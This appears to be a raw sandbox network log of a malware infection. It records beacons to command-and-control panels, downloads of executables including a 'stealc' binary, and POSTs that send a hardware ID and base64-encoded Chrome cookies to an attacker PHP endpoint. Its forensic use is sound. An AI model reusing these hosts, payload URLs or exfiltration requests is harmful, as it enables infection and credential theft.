Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:22:02 GMTContent-Type: application/octet-streamContent-Length: 1973760Last-Modified: Fri, 27 Sep 2024 02:17:51 GMTConnection: keep-aliveETag: "66f615cf-1e1e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 60 4e 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4e 00 00 04 00 00 32 80 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 4e 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 41 4e 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2c 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6b 67 7a 66 7a 78 75 00 10 1b 00 00 40 33 00 00 04 1b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 76 78 62 68 7a 73 76 00 10 00 00 00 50 4e 00 00 04 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 4e 00 00 22 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000004001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000005001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.17Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: GET /thebig/stories.exe HTTP/1.1Host: 176.113.115.95
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJECAAKKFHCFIECAAAKEHost: 185.215.113.17Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 39 45 32 46 37 32 32 41 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 2d 2d 0d 0a Data Ascii: ------HJECAAKKFHCFIECAAAKEContent-Disposition: form-data; name="hwid"EF9E2F722A951117388365------HJECAAKKFHCFIECAAAKEContent-Disposition: form-data; name="build"default2------HJECAAKKFHCFIECAAAKE--
Source: global traffic	HTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="message"browsers------AFHDAKJKFCFBGCBGDHCB--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="message"plugins------CBKJJEHCBAKFBFHJKFBK--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHCHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 2d 2d 0d 0a Data Ascii: ------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="message"fplugins------BKEBFHIJECFIDGDGCGHC--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDGHost: 185.215.113.17Content-Length: 6567Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 30 36 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000065001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGHost: 185.215.113.17Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHIHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 2d 2d 0d 0a Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file"------KJKKJKEHDBGIDGDHCFHI--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000191001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 2d 2d 0d 0a Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="file"------GCAKKECAEGDGCBFIJEGH--
